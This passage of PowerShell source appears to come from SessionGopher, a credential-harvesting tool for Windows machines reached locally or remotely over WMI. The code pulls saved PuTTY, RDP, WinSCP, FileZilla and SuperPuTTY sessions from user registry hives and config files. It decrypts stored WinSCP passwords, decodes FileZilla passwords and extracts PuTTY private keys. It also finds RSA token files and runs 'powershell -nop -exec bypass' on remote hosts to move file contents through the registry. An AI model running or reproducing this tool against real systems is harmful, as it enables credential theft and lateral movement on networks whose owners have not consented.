$ArrayOfPuTTYSessions | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # If PuTTY session exists
|
||||
|
||||
if (($RDPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
|
||||
Write-Verbose "Found saved RDP sessions."
|
||||
# Get all sessions
|
||||
$RDPSessions = $RDPSessions | Select-Object -ExpandProperty sNames
|
||||
|
||||
foreach ($RDPSession in $RDPSessions) {
|
||||
|
||||
$RDPSessionObject = "" | Select-Object -Property Source,Hostname,Username
|
||||
|
||||
$Location = $RDPPath + "\" + $RDPSession
|
||||
|
||||
$RDPSessionObject.Source = $Source
|
||||
$RDPSessionObject.Hostname = $RDPSession
|
||||
$RDPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"UserNameHint" @optionalCreds).sValue
|
||||
|
||||
[void]$ArrayOfRDPSessions.Add($RDPSessionObject)
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfRDPSessions.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Sessions" -Value $ArrayOfRDPSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfRDPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\RDP.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "Microsoft RDP Sessions"
|
||||
$ArrayOfRDPSessions | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # If RDP sessions exist
|
||||
|
||||
# If we find the SuperPuTTY Sessions.xml file where we would expect it
|
||||
if ($SuperPuTTYPath.Name) {
|
||||
Write-Verbose "Found SupePuTTY sessions.xml"
|
||||
$File = "C:\Users\$MappedUserName\Documents\SuperPuTTY\Sessions.xml"
|
||||
$FileContents = DownloadAndExtractFromRemoteRegistry $File
|
||||
|
||||
[xml]$SuperPuTTYXML = $FileContents
|
||||
(ProcessSuperPuTTYFile $SuperPuTTYXML)
|
||||
|
||||
}
|
||||
|
||||
# If we find the FileZilla sitemanager.xml file where we would expect it
|
||||
if ($FileZillaPath.Name) {
|
||||
Write-Verbose "Found FileZilaa sitemanager.xml"
|
||||
$File = "C:\Users\$MappedUserName\AppData\Roaming\FileZilla\sitemanager.xml"
|
||||
$FileContents = DownloadAndExtractFromRemoteRegistry $File
|
||||
|
||||
[xml]$FileZillaXML = $FileContents
|
||||
(ProcessFileZillaFile $FileZillaXML)
|
||||
|
||||
} # FileZilla
|
||||
|
||||
} # for each SID
|
||||
|
||||
if ($Everything) {
|
||||
Write-Verbose "Running the every test. Reading files on the target machine. This may take few minutes."
|
||||
$ArrayofPPKFiles = New-Object System.Collections.ArrayList
|
||||
$ArrayofRDPFiles = New-Object System.Collections.ArrayList
|
||||
$ArrayofsdtidFiles = New-Object System.Collections.ArrayList
|
||||
|
||||
$FilePathsFound = (Get-WmiObject -Class 'CIM_DataFile' -Filter "Drive='C:' AND extension='ppk' OR extension='rdp' OR extension='.sdtid'" -ComputerName $RemoteComputer @optionalCreds | Select Name)
|
||||
|
||||
(ProcessThoroughRemote $FilePathsFound)
|
||||
|
||||
}
|
||||
|
||||
|
||||
# Check if the error is access denied.
|
||||
$ourerror = $error[0]
|
||||
if ($ourerror.Exception.Message.Contains("Access is denied.")) {
|
||||
Write-Warning "Access Denied on $RemoteComputer"
|
||||
} elseif ($ourerror.Exception.Message.Contains("The RPC server is unavailable.")) {
|
||||
Write-Warning "Cannot connect to $RemoteComputer. Is the host up and accepting RPC connections?"
|
||||
} else {
|
||||
Write-Debug "$($ourerror.Exception.Message)"
|
||||
}
|
||||
}
|
||||
}# for each remote computer
|
||||
# Else, we run SessionGopher locally
|
||||
} else {
|
||||
|
||||
Write-Output "Digging on"(Hostname)"..."
|
||||
|
||||
# Aggregate all user hives in HKEY_USERS into a variable
|
||||
$UserHives = Get-ChildItem Registry::HKEY_USERS\ -ErrorAction SilentlyContinue | Where-Object {$_.Name -match '^HKEY_USERS\\S-1-5-21-[\d\-]+$'}
|
||||
|
||||
# For each SID beginning in S-15-21-. Loops through each user hive in HKEY_USERS.
|
||||
foreach($Hive in $UserHives) {
|
||||
|
||||
# Created for each user found. Contains all PuTTY, WinSCP, FileZilla, RDP information.
|
||||
$UserObject = New-Object PSObject
|
||||
|
||||
$ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfPPKFiles = New-Object System.Collections.ArrayList
|
||||
$ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfRDPSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfRDPFiles = New-Object System.Collections.ArrayList
|
||||
$ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList
|
||||
|
||||
$objUser = (GetMappedSID)
|
||||
$Source = (Hostname) + "\" + (Split-Path $objUser.Value -Leaf)
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "Source" -Value $objUser.Value
|
||||
|
||||
# Construct PuTTY, WinSCP, RDP, FileZilla session paths from base key
|
||||
$PuTTYPath = Join-Path $Hive.PSPath "\$PuTTYPathEnding"
|
||||
$WinSCPPath = Join-Path $Hive.PSPath "\$WinSCPPathEnding"
|
||||
$MicrosoftRDPPath = Join-Path $Hive.PSPath "\$RDPPathEnding"
|
||||
$FileZillaPath = "C:\Users\" + (Split-Path -Leaf $UserObject."Source") + "\AppData\Roaming\FileZilla\sitemanager.xml"
|
||||
$SuperPuTTYPath = "C:\Users\" + (Split-Path -Leaf $UserObject."Source") + "\Documents\SuperPuTTY\Sessions.xml"
|
||||
|
||||
if (Test-Path $FileZillaPath) {
|
||||
|
||||
[xml]$FileZillaXML = Get-Content $FileZillaPath
|
||||
(ProcessFileZillaFile $FileZillaXML)
|
||||
|
||||
}
|
||||
|
||||
if (Test-Path $SuperPuTTYPath) {
|
||||
|
||||
[xml]$SuperPuTTYXML = Get-Content $SuperPuTTYPath
|
||||
(ProcessSuperPuTTYFile $SuperPuTTYXML)
|
||||
|
||||
}
|
||||
|
||||
if (Test-Path $MicrosoftRDPPath) {
|
||||
|
||||
# Aggregates all saved sessions from that user's RDP client
|
||||
$AllRDPSessions = Get-ChildItem $MicrosoftRDPPath
|
||||
|
||||
(ProcessRDPLocal $AllRDPSessions)
|
||||
|
||||
} # If (Test-Path MicrosoftRDPPath)
|
||||
|
||||
if (Test-Path $WinSCPPath) {
|
||||
|
||||
# Aggregates all saved sessions from that user's WinSCP client
|
||||
$AllWinSCPSessions = Get-ChildItem $WinSCPPath
|
||||
|
||||
(ProcessWinSCPLocal $AllWinSCPSessions)
|
||||
|
||||
} # If (Test-Path WinSCPPath)
|
||||
|
||||
if (Test-Path $PuTTYPath) {
|
||||
|
||||
# Aggregates all saved sessions from that user's PuTTY client
|
||||
$AllPuTTYSessions = Get-ChildItem $PuTTYPath
|
||||
|
||||
(ProcessPuTTYLocal $AllPuTTYSessions)
|
||||
|
||||
} # If (Test-Path PuTTYPath)
|
||||
|
||||
} # For each Hive in UserHives
|
||||
|
||||
# If run in Thorough Mode
|
||||
if ($Everything) {
|
||||
|
||||
# Contains raw i-node data for files with extension .ppk, .rdp, and sdtid respectively, found by Get-ChildItem
|
||||
$PPKExtensionFilesINodes = New-Object System.Collections.ArrayList
|
||||
$RDPExtensionFilesINodes = New-Object System.Collections.ArrayList
|
||||
$sdtidExtensionFilesINodes = New-Object System.Collections.ArrayList
|
||||
|
||||
# All drives found on system in one variable
|
||||
$AllDrives = Get-PSDrive
|
||||
|
||||
(ProcessThoroughLocal $AllDrives)
|
||||
|
||||
(ProcessPPKFile $PPKExtensionFilesINodes)
|
||||
(ProcessRDPFile $RDPExtensionFilesINodes)
|
||||
(ProcesssdtidFile $sdtidExtensionFilesINodes)
|
||||
|
||||
} # If Thorough
|
||||
|
||||
} # Else -- run SessionGopher locally
|
||||
|
||||
} # Invoke-SessionGopher
|
||||
|
||||
####################################################################################
|
||||
####################################################################################
|
||||
## Registry Querying Helper Functions
|
||||
####################################################################################
|
||||
####################################################################################
|
||||
|
||||
# Maps the SID from HKEY_USERS to a username through the HKEY_LOCAL_MACHINE hive
|
||||
function GetMappedSID {
|
||||
|
||||
# If getting SID from remote computer
|
||||
if ($Inputlist -or $ComputerName -or $AllDomain) {
|
||||
# Get the username for SID we discovered has saved sessions
|
||||
$SIDPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$SID"
|
||||
$Value = "ProfileImagePath"
|
||||
|
||||
(Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM,$SIDPath,$Value @optionalCreds).sValue
|
||||
# Else, get local SIDs
|
||||
} else {
|
||||
# Converts user SID in HKEY_USERS to username
|
||||
$SID = (Split-Path $Hive.Name -Leaf)
|
||||
$objSID = New-Object System.Security.Principal.SecurityIdentifier("$SID")
|
||||
$objSID.Translate( [System.Security.Principal.NTAccount])
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function DownloadAndExtractFromRemoteRegistry($File) {
|
||||
# The following code is taken from Christopher Truncer's WMIOps script on GitHub. It gets file contents through WMI by
|
||||
# downloading the file's contents to the remote computer's registry, and then extracting the value from that registry location
|
||||
$fullregistrypath = "HKLM:\Software\Microsoft\DRM"
|
||||
$registrydownname = "ReadMe"
|
||||
$regpath = "SOFTWARE\Microsoft\DRM"
|
||||
|
||||
# On remote system, save file to registry
|
||||
Write-Verbose "Reading remote file and writing on remote registry"
|
||||
$remote_command = '$fct = Get-Content -Encoding byte -Path ''' + "$File" + '''; $fctenc = [System.Convert]::ToBase64String($fct); New-ItemProperty -Path ' + "'$fullregistrypath'" + ' -Name ' + "'$registrydownname'" + ' -Value $fctenc -PropertyType String -Force'
|
||||
$remote_command = 'powershell -nop -exec bypass -c "' + $remote_command + '"'
|
||||
|
||||
$null = Invoke-WmiMethod -class win32_process -Name Create -Argumentlist $remote_command -ComputerName $RemoteComputer @optionalCreds
|
||||
|
||||
# Sleeping to let remote system read and store file
|
||||
Start-Sleep -s 15
|
||||
|
||||
$remote_reg = ""
|
||||
|
||||
# Grab file from remote system's registry
|
||||
$remote_reg = Invoke-WmiMethod -Namespace 'root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKLM, $regpath, $registrydownname -Computer $RemoteComputer @optionalCreds
|
||||
|
||||
$decoded = [System.Convert]::FromBase64String($remote_reg.sValue)
|
||||
$UTF8decoded = [System.Text.Encoding]::UTF8.GetString($decoded)
|
||||
|
||||
# Removing Registry value from remote system
|
||||
$null = Invoke-WmiMethod -Namespace 'root\default' -Class 'StdRegProv' -Name 'DeleteValue' -Argumentlist $reghive, $regpath, $registrydownname -ComputerName $RemoteComputer @optionalCreds
|
||||
|
||||
$UTF8decoded
|
||||
|
||||
}
|
||||
|
||||
####################################################################################
|
||||
####################################################################################
|
||||
## File Processing Helper Functions
|
||||
####################################################################################
|
||||
####################################################################################
|
||||
|
||||
function ProcessThoroughLocal($AllDrives) {
|
||||
|
||||
foreach ($Drive in $AllDrives) {
|
||||
# If the drive holds a filesystem
|
||||
if ($Drive.Provider.Name -eq "FileSystem") {
|
||||
$Dirs = Get-ChildItem $Drive.Root -Recurse -ErrorAction SilentlyContinue
|
||||
foreach ($Dir in $Dirs) {
|
||||
Switch ($Dir.Extension) {
|
||||
".ppk" {[void]$PPKExtensionFilesINodes.Add($Dir)}
|
||||
".rdp" {[void]$RDPExtensionFilesINodes.Add($Dir)}
|
||||
".sdtid" {[void]$sdtidExtensionFilesINodes.Add($Dir)}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function ProcessThoroughRemote($FilePathsFound) {
|
||||
|
||||
foreach ($FilePath in $FilePathsFound) {
|
||||
# Each object we create for the file extension found from a -Thorough search will have the same properties (Source, Path to File)
|
||||
$EverythingObject = "" | Select-Object -Property Source,Path
|
||||
$EverythingObject.Source = $RemoteComputer
|
||||
|
||||
$Extension = [IO.Path]::GetExtension($FilePath.Name)
|
||||
|
||||
if ($Extension -eq ".ppk") {
|
||||
$EverythingObject.Path = $FilePath.Name
|
||||
[void]$ArrayofPPKFiles.Add($EverythingObject)
|
||||
} elseif ($Extension -eq ".rdp") {
|
||||
$EverythingObject.Path = $FilePath.Name
|
||||
[void]$ArrayofRDPFiles.Add($EverythingObject)
|
||||
} elseif ($Extension -eq ".sdtid") {
|
||||
$EverythingObject.Path = $FilePath.Name
|
||||
[void]$ArrayofsdtidFiles.Add($EverythingObject)
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfPPKFiles.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "PPK Files" -Value $ArrayOfRDPFiles
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfPPKFiles | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY ppk Files.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "PuTTY Private Key Files (.ppk)"
|
||||
$ArrayOfPPKFiles | Format-List | Out-String
|
||||
}
|
||||
}
|
||||
|
||||
if ($ArrayOfRDPFiles.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Files" -Value $ArrayOfRDPFiles
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfRDPFiles | Export-CSV -Append -Path ($OutputDirectory + "\Microsoft rdp Files.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "Microsoft RDP Connection Files (.rdp)"
|
||||
$ArrayOfRDPFiles | Format-List | Out-String
|
||||
}
|
||||
}
|
||||
if ($ArrayOfsdtidFiles.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "sdtid Files" -Value $ArrayOfsdtidFiles
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfsdtidFiles | Export-CSV -Append -Path ($OutputDirectory + "\RSA sdtid Files.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "RSA Tokens (sdtid)"
|
||||
$ArrayOfsdtidFiles | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # ProcessThoroughRemote
|
||||
|
||||
function ProcessPuTTYLocal($AllPuTTYSessions) {
|
||||
|
||||
# For each PuTTY saved session, extract the information we want
|
||||
foreach($Session in $AllPuTTYSessions) {
|
||||
|
||||
$PuTTYSessionObject = "" | Select-Object -Property Source,Session,Hostname
|
||||
|
||||
$PuTTYSessionObject.Source = $Source
|
||||
$PuTTYSessionObject.Session = (Split-Path $Session -Leaf)
|
||||
$PuTTYSessionObject.Hostname = ((Get-ItemProperty -Path ("Microsoft.PowerShell.Core\Registry::" + $Session) -Name "Hostname" -ErrorAction SilentlyContinue).Hostname)
|
||||
|
||||
# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
|
||||
[void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)
|
||||
|
||||
}
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "PuTTY Sessions"
|
||||
$ArrayOfPuTTYSessions | Format-List | Out-String
|
||||
}
|
||||
|
||||
# Add the array of PuTTY session objects to UserObject
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "PuTTY Sessions" -Value $ArrayOfPuTTYSessions
|
||||
|
||||
} # ProcessPuTTYLocal
|
||||
|
||||
function ProcessRDPLocal($AllRDPSessions) {
|
||||
|
||||
# For each RDP saved session, extract the information we want
|
||||
foreach($Session in $AllRDPSessions) {
|
||||
|
||||
$PathToRDPSession = "Microsoft.PowerShell.Core\Registry::" + $Session
|
||||
|
||||
$MicrosoftRDPSessionObject = "" | Select-Object -Property Source,Hostname,Username
|
||||
|
||||
$MicrosoftRDPSessionObject.Source = $Source
|
||||
$MicrosoftRDPSessionObject.Hostname = (Split-Path $Session -Leaf)
|
||||
$MicrosoftRDPSessionObject.Username = ((Get-ItemProperty -Path $PathToRDPSession -Name "UsernameHint" -ErrorAction SilentlyContinue).UsernameHint)
|
||||
|
||||
# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
|
||||
[void]$ArrayOfRDPSessions.Add($MicrosoftRDPSessionObject)
|
||||
|
||||
} # For each Session in AllRDPSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfRDPSessions | Export-CSV -Append -Path ($OutputDirectory + "\RDP.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "Microsoft Remote Desktop (RDP) Sessions"
|
||||
$ArrayOfRDPSessions | Format-List | Out-String
|
||||
}
|
||||
|
||||
# Add the array of RDP session objects to UserObject
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Sessions" -Value $ArrayOfRDPSessions
|
||||
|
||||
} #ProcessRDPLocal
|
||||
|
||||
function ProcessWinSCPLocal($AllWinSCPSessions) {
|
||||
|
||||
# For each WinSCP saved session, extract the information we want
|
||||
foreach($Session in $AllWinSCPSessions) {
|
||||
|
||||
$PathToWinSCPSession = "Microsoft.PowerShell.Core\Registry::" + $Session
|
||||
|
||||
$WinSCPSessionObject = "" | Select-Object -Property Source,Session,Hostname,Username,Password
|
||||
|
||||
$WinSCPSessionObject.Source = $Source
|
||||
$WinSCPSessionObject.Session = (Split-Path $Session -Leaf)
|
||||
$WinSCPSessionObject.Hostname = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Hostname" -ErrorAction SilentlyContinue).Hostname)
|
||||
$WinSCPSessionObject.Username = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Username" -ErrorAction SilentlyContinue).Username)
|
||||
$WinSCPSessionObject.Password = ((Get-ItemProperty -Path $PathToWinSCPSession -Name "Password" -ErrorAction SilentlyContinue).Password)
|
||||
|
||||
if ($WinSCPSessionObject.Password) {
|
||||
$MasterPassUsed = ((Get-ItemProperty -Path (Join-Path $Hive.PSPath "SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Security") -Name "UseMasterPassword" -ErrorAction SilentlyContinue).UseMasterPassword)
|
||||
|
||||
# If the user is not using a master password, we can crack it:
|
||||
if (!$MasterPassUsed) {
|
||||
$WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)
|
||||
# Else, the user is using a master password. We can't retrieve plaintext credentials for it.
|
||||
} else {
|
||||
$WinSCPSessionObject.Password = "Saved in session, but master password prevents plaintext recovery"
|
||||
}
|
||||
}
|
||||
|
||||
# ArrayList.Add() by default prints the index to which it adds the element. Casting to [void] silences this.
|
||||
[void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)
|
||||
|
||||
} # For each Session in AllWinSCPSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfWinSCPSessions | Export-CSV -Append -Path ($OutputDirectory + "\WinSCP.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "WinSCP Sessions"
|
||||
$ArrayOfWinSCPSessions | Format-List | Out-String
|
||||
}
|
||||
|
||||
# Add the array of WinSCP session objects to the target user object
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "WinSCP Sessions" -Value $ArrayOfWinSCPSessions
|
||||
|
||||
} # ProcessWinSCPLocal
|
||||
|
||||
function ProcesssdtidFile($sdtidExtensionFilesINodes) {
|
||||
|
||||
foreach ($Path in $sdtidExtensionFilesINodes.VersionInfo.FileName) {
|
||||
|
||||
$sdtidFileObject = "" | Select-Object -Property "Source","Path"
|
||||
|
||||
$sdtidFileObject."Source" = $Source
|
||||
$sdtidFileObject."Path" = $Path
|
||||
|
||||
[void]$ArrayOfsdtidFiles.Add($sdtidFileObject)
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfsdtidFiles.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "sdtid Files" -Value $ArrayOfsdtidFiles
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfsdtidFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\RSA sdtid Files.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "RSA Tokens (sdtid)"
|
||||
$ArrayOfsdtidFiles | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # Process sdtid File
|
||||
|
||||
function ProcessRDPFile($RDPExtensionFilesINodes) {
|
||||
|
||||
# Extracting the filepath from the i-node information stored in RDPExtensionFilesINodes
|
||||
foreach ($Path in $RDPExtensionFilesINodes.VersionInfo.FileName) {
|
||||
|
||||
$RDPFileObject = "" | Select-Object -Property "Source","Path","Hostname","Gateway","Prompts for Credentials","Administrative Session"
|
||||
|
||||
$RDPFileObject."Source" = (Hostname)
|
||||
|
||||
# The next several lines use regex pattern matching to store relevant info from the .rdp file into our object
|
||||
$RDPFileObject."Path" = $Path
|
||||
$RDPFileObject."Hostname" = try { (Select-String -Path $Path -Pattern "full address:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
|
||||
$RDPFileObject."Gateway" = try { (Select-String -Path $Path -Pattern "gatewayhostname:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
|
||||
$RDPFileObject."Administrative Session" = try { (Select-String -Path $Path -Pattern "administrative session:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
|
||||
$RDPFileObject."Prompts for Credentials" = try { (Select-String -Path $Path -Pattern "prompt for credentials:[a-z]:(.*)").Matches.Groups[1].Value } catch {}
|
||||
|
||||
if (!$RDPFileObject."Administrative Session" -or !$RDPFileObject."Administrative Session" -eq 0) {
|
||||
$RDPFileObject."Administrative Session" = "Does not connect to admin session on remote host"
|
||||
} else {
|
||||
$RDPFileObject."Administrative Session" = "Connects to admin session on remote host"
|
||||
}
|
||||
if (!$RDPFileObject."Prompts for Credentials" -or $RDPFileObject."Prompts for Credentials" -eq 0) {
|
||||
$RDPFileObject."Prompts for Credentials" = "No"
|
||||
} else {
|
||||
$RDPFileObject."Prompts for Credentials" = "Yes"
|
||||
}
|
||||
|
||||
[void]$ArrayOfRDPFiles.Add($RDPFileObject)
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfRDPFiles.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Files" -Value $ArrayOfRDPFiles
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfRDPFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\Microsoft rdp Files.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "Microsoft RDP Connection Files (.rdp)"
|
||||
$ArrayOfRDPFiles | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # Process RDP File
|
||||
|
||||
function ProcessPPKFile($PPKExtensionFilesINodes) {
|
||||
|
||||
# Extracting the filepath from the i-node information stored in PPKExtensionFilesINodes
|
||||
foreach ($Path in $PPKExtensionFilesINodes.VersionInfo.FileName) {
|
||||
|
||||
# Private Key Encryption property identifies whether the private key in this file is encrypted or if it can be used as is
|
||||
$PPKFileObject = "" | Select-Object -Property "Source","Path","Protocol","Comment","Private Key Encryption","Private Key","Private MAC"
|
||||
|
||||
$PPKFileObject."Source" = (Hostname)
|
||||
|
||||
# The next several lines use regex pattern matching to store relevant info from the .ppk file into our object
|
||||
$PPKFileObject."Path" = $Path
|
||||
|
||||
$PPKFileObject."Protocol" = try { (Select-String -Path $Path -Pattern ": (.*)" -Context 0,0).Matches.Groups[1].Value } catch {}
|
||||
$PPKFileObject."Private Key Encryption" = try { (Select-String -Path $Path -Pattern "Encryption: (.*)").Matches.Groups[1].Value } catch {}
|
||||
$PPKFileObject."Comment" = try { (Select-String -Path $Path -Pattern "Comment: (.*)").Matches.Groups[1].Value } catch {}
|
||||
$NumberOfPrivateKeyLines = try { (Select-String -Path $Path -Pattern "Private-Lines: (.*)").Matches.Groups[1].Value } catch {}
|
||||
$PPKFileObject."Private Key" = try { (Select-String -Path $Path -Pattern "Private-Lines: (.*)" -Context 0,$NumberOfPrivateKeyLines).Context.PostContext -Join "" } catch {}
|
||||
$PPKFileObject."Private MAC" = try { (Select-String -Path $Path -Pattern "Private-MAC: (.*)").Matches.Groups[1].Value } catch {}
|
||||
|
||||
# Add the object we just created to the array of .ppk file objects
|
||||
[void]$ArrayOfPPKFiles.Add($PPKFileObject)
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfPPKFiles.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "PPK Files" -Value $ArrayOfPPKFiles
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfPPKFiles | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY ppk Files.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "PuTTY Private Key Files (.ppk)"
|
||||
$ArrayOfPPKFiles | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # Process PPK File
|
||||
|
||||
function ProcessFileZillaFile($FileZillaXML) {
|
||||
|
||||
# Locate all <Server> nodes (aka session nodes), iterate over them
|
||||
foreach($FileZillaSession in $FileZillaXML.SelectNodes('//FileZilla3/Servers/Server')) {
|
||||
# Hashtable to store each session's data
|
||||
$FileZillaSessionHash = @{}
|
||||
|
||||
# Iterates over each child node under <Server> (aka session)
|
||||
$FileZillaSession.ChildNodes | ForEach-Object {
|
||||
|
||||
$FileZillaSessionHash["Source"] = $Source
|
||||
# If value exists, make a key-value pair for it in the hash table
|
||||
if ($_.InnerText) {
|
||||
if ($_.Name -eq "Pass") {
|
||||
$FileZillaSessionHash["Password"] = $_.InnerText
|
||||
} else {
|
||||
# Populate session data based on the node name
|
||||
$FileZillaSessionHash[$_.Name] = $_.InnerText
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
# Create object from collected data, excluding some trivial information
|
||||
[void]$ArrayOfFileZillaSessions.Add((New-Object PSObject -Property $FileZillaSessionHash | Select-Object -Property * -ExcludeProperty "#text",LogonType,Type,BypassProxy,SyncBrowsing,PasvMode,DirectoryComparison,MaximumMultipleConnections,EncodingType,TimezoneOffset,Colour))
|
||||
|
||||
} # ForEach FileZillaSession in FileZillaXML.SelectNodes()
|
||||
|
||||
# base64_decode the stored encoded session passwords, and decode protocol
|
||||
foreach ($Session in $ArrayOfFileZillaSessions) {
|
||||
$Session.Password = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Session.Password))
|
||||
if ($Session.Protocol -eq "0") {
|
||||
$Session.Protocol = "Use FTP over TLS if available"
|
||||
} elseif ($Session.Protocol -eq 1) {
|
||||
$Session.Protocol = "Use SFTP"
|
||||
} elseif ($Session.Protocol -eq 3) {
|
||||
$Session.Protocol = "Require implicit FTP over TLS"
|
||||
} elseif ($Session.Protocol -eq 4) {
|
||||
$Session.Protocol = "Require explicit FTP over TLS"
|
||||
} elseif ($Session.Protocol -eq 6) {
|
||||
$Session.Protocol = "Only use plain FTP (insecure)"
|
||||
}
|
||||
}
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfFileZillaSessions | Export-CSV -Append -Path ($OutputDirectory + "\FileZilla.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "FileZilla Sessions"
|
||||
$ArrayOfFileZillaSessions | Format-List | Out-String
|
||||
}
|
||||
|
||||
# Add the array of FileZilla session objects to the target user object
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "FileZilla Sessions" -Value $ArrayOfFileZillaSessions
|
||||
|
||||
} # ProcessFileZillaFile
|
||||
|
||||
function ProcessSuperPuTTYFile($SuperPuTTYXML) {
|
||||
|
||||
foreach($SuperPuTTYSessions in $SuperPuTTYXML.ArrayOfSessionData.SessionData) {
|
||||
|
||||
foreach ($SuperPuTTYSession in $SuperPuTTYSessions) {
|
||||
if ($SuperPuTTYSession -ne $null) {
|
||||
|
||||
$SuperPuTTYSessionObject = "" | Select-Object -Property "Source","SessionId","SessionName","Host","Username","ExtraArgs","Port","Putty Session"
|
||||
|
||||
$SuperPuTTYSessionObject."Source" = $Source
|
||||
$SuperPuTTYSessionObject."SessionId" = $SuperPuTTYSession.SessionId
|
||||
$SuperPuTTYSessionObject."SessionName" = $SuperPuTTYSession.SessionName
|
||||
$SuperPuTTYSessionObject."Host" = $SuperPuTTYSession.Host
|
||||
$SuperPuTTYSessionObject."Username" = $SuperPuTTYSession.Username
|
||||
$SuperPuTTYSessionObject."ExtraArgs" = $SuperPuTTYSession.ExtraArgs
|
||||
$SuperPuTTYSessionObject."Port" = $SuperPuTTYSession.Port
|
||||
$SuperPuTTYSessionObject."PuTTY Session" = $SuperPuTTYSession.PuttySession
|
||||
|
||||
[void]$ArrayOfSuperPuTTYSessions.Add($SuperPuTTYSessionObject)
|
||||
}
|
||||
}
|
||||
|
||||
} # ForEach SuperPuTTYSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfSuperPuTTYSessions | Export-CSV -Append -Path ($OutputDirectory + "\SuperPuTTY.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "SuperPuTTY Sessions"
|
||||
$ArrayOfSuperPuTTYSessions | Out-String
|
||||
}
|
||||
|
||||
# Add the array of SuperPuTTY session objects to the target user object
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "SuperPuTTY Sessions" -Value $ArrayOfSuperPuTTYSessions
|
||||
|
||||
} # ProcessSuperPuTTYFile
|
||||
|
